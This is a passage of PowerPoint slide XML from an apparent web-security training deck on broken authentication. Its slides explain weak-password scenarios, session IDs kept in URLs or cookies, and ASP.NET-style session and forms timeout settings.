              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Most authentication attacks occur due to the continued use of passwords as a sole factor. Once considered best practices, password rotation and complexity requirements are viewed as encouraging users to use, and reuse, weak passwords. Organizations are recommended to stop these practices per NIST 800-63 and use multi-factor authentication. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Scenario #3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Application session timeouts aren’t set properly. A user uses a public computer to access an application. Instead of selecting “logout” the user simply closes the browser tab and walks away. An attacker uses the same browser an hour later, and the user is still authenticated. </a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448143DA-6E5D-4234-95D3-9FC4E8E8AE59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918043" y="903044"/>
            <a:ext cx="6867525" cy="2152650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:shade val="85000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="88900" cap="sq">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:lumMod val="75000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>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37617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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1567150"/>
            <a:ext cx="10876793" cy="2754600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Persisting state in a stateless protocol:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTTP is a stateless protocol </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Subsequent connections are entirely independent to previous ones </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uniquely – and securely – identifying the same user across multiple requests needs to be manually constructed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We do this by persisting a piece of data unique to the user across requests </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1437847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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1567150"/>
            <a:ext cx="10876793" cy="3885679"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Session persistence in the URL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How it works: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An ID unique to the session is generated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That ID is then returned in the URL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All subsequent requests by the browser include the ID in the URL </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What’s wrong with this? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs are often shared (social media, email) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs are also often logged (proxies, web server logs) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URLs are retrievable from browser history </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974820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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1567150"/>
            <a:ext cx="10876793" cy="3608680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>Session persistence in a cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>How it works: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An ID unique to the session is generated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>That ID is then returned in a cookie </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>All subsequent requests by the browser send the cookie with it </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r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>What’s wrong with this? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The browser needs cookies enabled </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14079538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044564-88C2-4821-A15D-9211DE6C6F46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553602" y="201313"/>
            <a:ext cx="6843412"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3. Broken Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1567150"/>
            <a:ext cx="10876793" cy="4162678"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>Session and forms timeout </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>timeout default to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>20 minutes </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>timeout defaults to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>30 minutes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But the Visual Studio templates set it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>two days</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D605666F-2621-4709-ADCD-C1C44C81229F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101686" y="3057525"/>
            <a:ext cx="8534400" cy="742950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="447794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877CB1-3E88-40B4-81CC-99ECDAA4C00E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-ZA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Title 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D99FB7E1-0688-4682-ABC3-FA12A346A2E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="446088"/>
            <a:ext cx="11337925" cy="709612"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1655303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DBAD643-E2B7-4DC1-B5EE-0069986E60F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="657603" y="1567150"/>
            <a:ext cx="10876793" cy="5547673"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>Sliding forms timeout vs Fixed forms timeout </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>By default, forms timeout is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>sliding </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Imagine a 30 minute forms timeout </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endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Now let’s change this to a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>fixed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>timeout </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The duration is still 30 mins </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-ZA" sz="1600" dirty="0" err="1">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E0189DF-3B74-4B68-A16B-374FE0A412AC}"/>
              </a:ext>
